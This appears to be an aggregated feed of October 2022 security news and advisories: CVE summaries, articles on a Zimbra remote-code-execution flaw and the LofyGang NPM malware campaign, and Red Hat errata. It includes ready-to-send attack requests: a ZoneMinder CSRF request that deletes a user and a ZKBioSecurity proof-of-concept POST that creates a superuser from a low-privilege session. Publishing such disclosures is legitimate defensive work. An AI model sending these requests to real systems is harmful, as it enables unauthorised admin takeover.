mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse.

CVE-2022-42703

A vulnerability classified as problematic has been found in Linux Kernel. This affects the function fib_nh_match of the file net/ipv4/fib_semantics.c of the component IPv4 Handler. The manipulation leads to out-of-bounds read. It is possible to initiate the attack remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-210357 was assigned to this vulnerability.

CVE-2022-3435

A severe remote code execution vulnerability in Zimbra's enterprise collaboration software and email platform is being actively exploited, with no patch currently available to remediate the issue.
The shortcoming, assigned CVE-2022-41352, carries a critical-severity rating of CVSS 9.8, providing a pathway for attackers to upload arbitrary files and carry out malicious actions on affected

A severe remote code execution vulnerability in Zimbra's enterprise collaboration software and email platform is being actively exploited, with no patch currently available to remediate the issue.

The shortcoming, assigned CVE-2022-41352, carries a critical-severity rating of CVSS 9.8, providing a pathway for attackers to upload arbitrary files and carry out malicious actions on affected installations.

"The vulnerability is due to the method (cpio) in which Zimbra's antivirus engine (Amavis) scans inbound emails," cybersecurity firm Rapid7 said in an analysis published this week.

The issue is said to have been abused since early September 2022, according to details shared on Zimbra forums. While a fix is yet to be released, Zimbra is urging users to install the "pax" utility and restart the Zimbra services.

"If the pax package is not installed, Amavis will fall-back to using cpio, unfortunately the fall-back is implemented poorly (by Amavis) and will allow an unauthenticated attacker to create and overwrite files on the Zimbra server, including the Zimbra webroot," the company said last month.

The vulnerability, which is present in versions 8.8.15 and 9.0 of the software, affects several Linux distributions such as Oracle Linux 8, Red Hat Enterprise Linux 8, Rocky Linux 8, and CentOS 8, with the exception of Ubuntu due to the fact that pax is already installed by default.

A successful exploitation of the flaw requires an attacker to email an archive file (CPIO or TAR) to a susceptible server, which is then inspected by Amavis using the cpio file archiver utility to extract its contents.

"Since cpio has no mode where it can be securely used on untrusted files, the attacker can write to any path on the filesystem that the Zimbra user can access," Rapid7 researcher Ron Bowes said. "The most likely outcome is for the attacker to plant a shell in the web root to gain remote code execution, although other avenues likely exist."

Zimbra said it expects the vulnerability to be addressed in the next Zimbra patch, which will remove the dependency on cpio and instead make pax a requirement. However, it has not offered a specific timeframe by when the fix will be available.

Rapid7 also noted that CVE-2022-41352 is "effectively identical" to CVE-2022-30333, a path traversal flaw in the Unix version of RARlab's unRAR utility which came to light earlier this June, the only difference being that the new flaw leverages CPIO and TAR archive formats instead of RAR.

Even more troublingly, Zimbra is said to be further vulnerable to another zero-day privilege escalation flaw, which could be chained with the cpio zero-day to achieve remote root compromise of the servers.

The fact that Zimbra has been a popular target for threat actors is by no means new. In August, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of adversaries exploiting multiple flaws in the software to breach networks.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploiting Unpatched RCE Flaw in Zimbra Collaboration Suite

ZoneMinder is a free, open source Closed-circuit television software application. In affected versions authenticated users can bypass CSRF keys by modifying the request supplied to the Zoneminder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request. An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.

Authenticated users can bypass CSRF keys by modifying the request supplied to the Zoneminder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request.

**Impact**

An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application.

**Example Request**

    GET /zm/index.php?view=options&tab=users&action=delete&markUids%5B%5D=13&deleteBtn=Delete HTTP/1.1
    Host: 10.0.10.107
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Origin: http://10.0.10.107
    Connection: close
    Referer: http://10.0.10.107/zm/index.php?view=options&tab=users
    Cookie: zmSkin=classic; zmCSS=base; zmLogsTable.bs.table.sortOrder=desc; zmLogsTable.bs.table.sortName=Message; zmLogsTable.bs.table.pageNumber=1; ZMSESSID=24u3uv4ed55n04f73slbu95pm9
    Upgrade-Insecure-Requests: 1
    

**Patches**

\[c0a4c05\]

**Workarounds**

None, please upgrade

**References**

https://www.trenchesofit.com/2022/09/30/3260/

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in https://github.com/ZoneMinder/zoneminder
*   Email us at info@zoneminder.com

CVE-2022-39290: CSRF Key Bypass Using HTTP Methods

An access control issue in ZKTeco ZKBioSecurity V5000 3.0.5_r allows attackers to arbitrarily create admin users via a crafted HTTP request.

**Full Disclosure mailing list archives**

_From_: Caio B <caioburgardt () gmail com>  
_Date_: Thu, 29 Sep 2022 11:20:39 -0300  

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0\_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's
permissions correctly. An attacker with "Person Self-Login" or "User"
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101
Firefox/102.0

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base\_index.action

Cookie: <INSERT\_LOW-PRIVILEGE\_COOKIE\_HERE>

Upgrade-Insecure-Requests: 1





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"





test\_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"





add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"





1657813612925\_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"





base

-----------------------------291763244192371568695079347--





#######################END#######################
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)** _Caio B (Sep 30)_

CVE-2022-36634: ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)

IBM CICS TX 11.1 could allow a local user to cause a denial of service due to improper load handling.  IBM X-Force ID:  229437.

  

**Summary**

IBM CICS TX Standard could allow a local user to cause a denial of service due to improper load handling. The fix removes this vulnerability (CVE-2022-34308) from IBM CICS TX Standard.

**Vulnerability Details**

**CVEID:**   CVE-2022-34308  
**DESCRIPTION:**   IBM CICS TX could allow a local user to cause a denial of service due to improper load handling.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/229437 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM CICS TX Standard

11.1

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

04 Oct 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

Review the IBM security bulletin disclaimer and definitions regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSL1TD","label":"CICS TX Standard"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"All","Edition":"","Line of Business":{"code":"LOB35","label":"Mainframe SW"}}\]

CVE-2022-34308: Security Bulletin: IBM CICS TX Standard is vulnerable to a local user causing a denial of service. (CVE-2022-34308)

The group has been operating for over a year, promoting their tools in hacking forums, stealing credit card information, and using typosquatting techniques to target open source software flaws.

The LofyGang threat group is using more than 200 malicious NPM packages with thousands of installations to steal credit card data, and gaming and streaming accounts, before spreading stolen credentials and loot in underground hacking forums.

According to a report from Checkmarx, the cyberattack group has been in operation since 2020, infecting open source supply chains with malicious packages in an effort to weaponize software applications.

The research team believes the group may have Brazilian origins, owing to the use of Brazilian Portuguese and a file called "brazil.js." which contained malware found in a couple of their malicious packages.

The report also details the group's tactic of leaking thousands of Disney+ and Minecraft accounts to an underground hacking community using the alias DyPolarLofy and promoting their hacking tools via GitHub.

"We saw several classes of malicious payloads, general password stealers, and Discord-specific persistent malware; some were embedded inside the package, and some downloaded the malicious payload during runtime from C2 servers," the Friday report noted.

**LofyGang Operates With Impunity**

The group has deployed tactics including typosquatting, which targets typing mistakes in the open source supply chain, as well as "StarJacking," whereby the package's GitHub repo URL is linked to an unrelated legitimate GitHub project.

"The package managers do not validate the accuracy of this reference, and we see attackers take advantage of that by stating their package's Git repository is legitimate and popular, which may trick the victim into thinking this is a legitimate package due to its so-called popularity," the report stated.

The ubiquity and success of open source software has made it a ripe target for malicious actors like LofyGang, explains Jossef Harush, head of Checkmarx's supply chain security engineering group.

He sees LofyGang's key characteristics as including its ability to build a large hacker community, abusing legitimate services as command-and-control (C2) servers, and its efforts in poisoning the open source ecosystem.

This activity continues even after three different reports — from Sonatype, Securelist, and jFrog — uncovered LofyGang's malicious efforts.

"They remain active and continue to publish malicious packages in the software supply chain arena," he says.

By publishing this report, Harush says he hopes to raise awareness of the evolution of attackers, who are now building communities with open source hack tools.

"Attackers count on victims to not pay enough attention to the details," he adds. "And honestly, even I, with years of experience, would potentially fall for some of those tricks as they seem like legitimate packages to the naked eye."

**Open Source Not Built for Security**

Harush points out that unfortunately the open source ecosystem was not built for security.

"While anybody can sign up and publish an open source package, no vetting process is in place to check if the package contains malicious code," he says.

A recent report from software-security firm Snyk and the Linux Foundation revealed about half of firms have an open source software security policy in place to guide developers in the use of components and frameworks.

However, the report also found that those who have such policies in place generally exhibit better security — Google is making available its process of vetting and patching software for security issues to help close avenues to hackers.

"We see attackers take advantage of this because it's super easy to publish malicious packages," he explains. "The lack of vetting powers in disguising the packages to appear legit with stolen images, similar names, or even referencing other legitimate Git projects' websites just to see they get the other projects' stars amount on their malicious packages pages."

**Heading Toward Supply Chain Attacks?**

From Harush's perspective, we're reaching the point where attackers realize the full potential of the open source supply chain attack surface.

"I expect open source supply chain attacks to evolve further into attackers aiming to steal not only the victim's credit card, but also the victim's workplace credentials, such as a GitHub account, and from there, aim for the bigger jackpots of software supply chain attacks," he says.

This would include the ability to access a workplace's private code repositories, with the capability to contribute code while impersonating the victim, planting backdoors in enterprise grade software, and more.

"Organizations can protect themselves by properly enforcing their developers with two-factor authentication, educate their software developers to not assume popular open source packages are safe if they appear to have many downloads or stars," Harush adds, "and to be vigilant to suspicious activities in software packages."

LofyGang Uses 100s of Malicious NPM Packages to Poison Open Source Software

Red Hat Security Advisory 2022-6838-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6838-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6838  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
expat-debuginfo-2.2.10-12.el9_0.3.aarch64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.aarch64.rpm  
expat-devel-2.2.10-12.el9_0.3.aarch64.rpm

ppc64le:  
expat-debuginfo-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-debugsource-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-devel-2.2.10-12.el9_0.3.ppc64le.rpm

s390x:  
expat-debuginfo-2.2.10-12.el9_0.3.s390x.rpm  
expat-debugsource-2.2.10-12.el9_0.3.s390x.rpm  
expat-devel-2.2.10-12.el9_0.3.s390x.rpm

x86_64:  
expat-debuginfo-2.2.10-12.el9_0.3.i686.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.x86_64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.i686.rpm  
expat-debugsource-2.2.10-12.el9_0.3.x86_64.rpm  
expat-devel-2.2.10-12.el9_0.3.i686.rpm  
expat-devel-2.2.10-12.el9_0.3.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
expat-2.2.10-12.el9_0.3.src.rpm

aarch64:  
expat-2.2.10-12.el9_0.3.aarch64.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.aarch64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.aarch64.rpm

ppc64le:  
expat-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.ppc64le.rpm  
expat-debugsource-2.2.10-12.el9_0.3.ppc64le.rpm

s390x:  
expat-2.2.10-12.el9_0.3.s390x.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.s390x.rpm  
expat-debugsource-2.2.10-12.el9_0.3.s390x.rpm

x86_64:  
expat-2.2.10-12.el9_0.3.i686.rpm  
expat-2.2.10-12.el9_0.3.x86_64.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.i686.rpm  
expat-debuginfo-2.2.10-12.el9_0.3.x86_64.rpm  
expat-debugsource-2.2.10-12.el9_0.3.i686.rpm  
expat-debugsource-2.2.10-12.el9_0.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz9BEdzjgjWX9erEAQgpEw//SAVaBRrOgFmB37H+zj9VIGGk+//euxLS  
eXo9/Yn+ysPrdDzSVMxPVoiUY7oyNmuf1tDhacy8p90ZJ+SqpbL2pqAxcVMgq0TF  
8ZMYh54aYp6UM559jonyw8vybrp9YA1LEas3PpctLESErqoM7zLD40oxG0f/o9ly  
K5ezEmbWtdRbkHGbx0waQEZdRinVVtRCnLU8tjRjaTl7/3129O9Qa8qYMhAx4IB4  
pCL8ZCSwFGeQ4va0vHZkcw1x2Qx5WVrFbRV68AYTV/ISGh/bQtPUT+Zk1y/KZKwy  
LQmjw4nX1I8Zpue4+yddOaApdlpTk5CSWkAIUDJOtm/GiKF/nKn6tkZm+LgobpSP  
bUaipq+MbDDsNlnL5vFYob1aqdGvCPh6CKDpbJ2zFFF8dEKMzp4ugJAOD1IVECk0  
5GUwLjo2TuMNJkARQYlZrWkgt5SDt+Rev1tJ4c+GoUiXG2BNzvPG3od+nPUfJEId  
NMDQ5wnyOdXrNV4bDp2A8E4B523YbeaMZ0hbT9k+A7n4ICJMfcxLdwYWR4Eefq7S  
rWHFYDEmrhFUCaB8CwS7yeCkig4xhHY2PeDTjSyorCkQ4hWdKWrhZLT4qEs0ZcQ0  
rTwCDyF0nu4d0V4jMb+gg1GVLFj4I6bhSSGCMf0phGIBF2nwLKuiBbzEPU4S1I1J  
v9xf4LYIGu8=wW9n  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6838-01

Red Hat Security Advisory 2022-6839-01 - Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: squid security update  
Advisory ID:       RHSA-2022:6839-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6839  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-41318  
====================================================================  
1. Summary:

An update for squid is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Squid is a high-performance proxy caching server for web clients,  
supporting FTP, Gopher, and HTTP data objects.

Security Fix(es):

* squid: buffer-over-read in SSPI and SMB authentication (CVE-2022-41318)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the squid service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2129771 - CVE-2022-41318 squid: buffer-over-read in SSPI and SMB authentication

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
squid-5.2-1.el9_0.2.src.rpm

aarch64:  
squid-5.2-1.el9_0.2.aarch64.rpm  
squid-debuginfo-5.2-1.el9_0.2.aarch64.rpm  
squid-debugsource-5.2-1.el9_0.2.aarch64.rpm

ppc64le:  
squid-5.2-1.el9_0.2.ppc64le.rpm  
squid-debuginfo-5.2-1.el9_0.2.ppc64le.rpm  
squid-debugsource-5.2-1.el9_0.2.ppc64le.rpm

s390x:  
squid-5.2-1.el9_0.2.s390x.rpm  
squid-debuginfo-5.2-1.el9_0.2.s390x.rpm  
squid-debugsource-5.2-1.el9_0.2.s390x.rpm

x86_64:  
squid-5.2-1.el9_0.2.x86_64.rpm  
squid-debuginfo-5.2-1.el9_0.2.x86_64.rpm  
squid-debugsource-5.2-1.el9_0.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41318  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz9A/tzjgjWX9erEAQgfZA/9HJUFYJLUsflB+655ZYluYALZgLYXdyUR  
5LdEVLft4Xk+0BNEII+F0ccPT6qYAFRQ65asWPVZtPKsOc9j8/B1AZ+LLXp9kYcV  
a6RfRVxjc/krmvAl7RysKNjg7QSagTsysMIZ3Bz+aiYKJuiESG5c7EedTHDTX2a2  
S0ZFHkIMID7NJrWAacnkYsSsMUO3Rz3kWBe163lC1Is8pSj0P+Z59qAu26Jrb8Jl  
0oMocTuVl+9QgVJF2GkybK45VxCVNlR8jNBsydrEilm/4rjdQAX0n2dxwYAL4Hu+  
Q6tf+Ifg6YsTPSQtex1ezSvq8cY4INmxAcfGy6mB3FUV1JXLcMmXbj7J6xsyX244  
eGI/4b8cAMOA6tFzx0cIMVvshHBRNw3iyp2Pi9M245VVBRBatGwQ4KVBq0XESKwB  
WArsEN9ZiJKi1F3qgwWIG6gL/l9bTHtQn1gkset3NnmVnT/JjJdzf5azP9TckEA7  
+WyRdC7Pcoi60aRrkMgMgycnLVdBNALY+rRJxSDy+pkmg0EIBQTUJoHHDqyKS/ei  
jebgINvq/zAMHzO+xzmIimJcqVbDU2pIPhTXYiFL0s5MJqsxSmJmG/Nc093QuHsE  
T7koB327qXVDu5RlGNf42Almw46/zWG7AaZtQUV7TOqM67LUCwsNPSJ6s1HCXZ+C  
LLsk+QabmmU=lAus  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6839-01

Red Hat Security Advisory 2022-6850-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openvswitch2.11 security update  
Advisory ID:       RHSA-2022:6850-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6850  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-2132  
====================================================================  
1. Summary:

An update for openvswitch2.11 is now available for Fast Datapath for Red  
Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 7 - noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* dpdk: DoS when a Vhost header crosses more than two descriptors and  
exhausts all mbufs (CVE-2022-2132)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2099475 - CVE-2022-2132 dpdk: DoS when a Vhost header crosses more than two descriptors and exhausts all mbufs

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 7:

Source:  
openvswitch2.11-2.11.3-96.2.el7fdp.src.rpm

noarch:  
openvswitch2.11-test-2.11.3-96.2.el7fdp.noarch.rpm

ppc64le:  
openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.ppc64le.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.ppc64le.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm

s390x:  
openvswitch2.11-2.11.3-96.2.el7fdp.s390x.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.s390x.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.s390x.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.s390x.rpm

x86_64:  
openvswitch2.11-2.11.3-96.2.el7fdp.x86_64.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.x86_64.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.x86_64.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2132  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz9A9NzjgjWX9erEAQhS6g//dFhnNsL6tYKMlk4Lrp34SksiKG0a7mVh  
pUzeQLBdgCIJ/AW/nYYAKdmLPAA9tbmYPGPEDq4lch7TmCqSTfurW+XJtddfiBjv  
MWFFGBEtTBZRB4T5RskKTjjgdwJdXSVX2D+LTFI7Z2ZdGvhtc6DcdYbvowP7S4Ni  
dZDx7ByueVuM0jJlHePgUMLv8SvT64SDPNWSJqsgM8MLWOMrBRc1RoOwYmWpRYJp  
ohvwvEbEiS6F8g6vDQGhVph2b0v5HYnjFvt5H3TaGVFlzbfsi+2orkXFnJQZ6ube  
I4HTboCKF4dYGiiSgMEOOYF6dbly4uw7cg+g8dlF8KpbQJKfGvyuD5WqKKnmFC+6  
Q031OQK6OzEfcq2LjJgnxq0CA4JjptO0dhfYPgZ8k1wRu/ZmHFs/fTydn7yihWj3  
ux3zkyjOIQUvpfxapxEfZ/DgiR1cU8zqN+Z5SGc365BdkYB2DlqUnFQFEqsLxIId  
R/HeMM1zn7MZ8V+n2pA2vV4HmKdYD8134ukT0B0El1cceERKDMZFKZLi/iXNIEhm  
xJQ+ibu8e/+JngOhmEmDHz2QQaEyIav6jceWCNig59By5oGfRJ8fvq7TQ1TtECDt  
b9imH8r/ylKbjhaPyvrGbPuV7ARuKQxs5/r/UhIAA1kvPrt1jGxST6jUeVO/Mi6K  
3jv+d9QUyS4!Lp  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux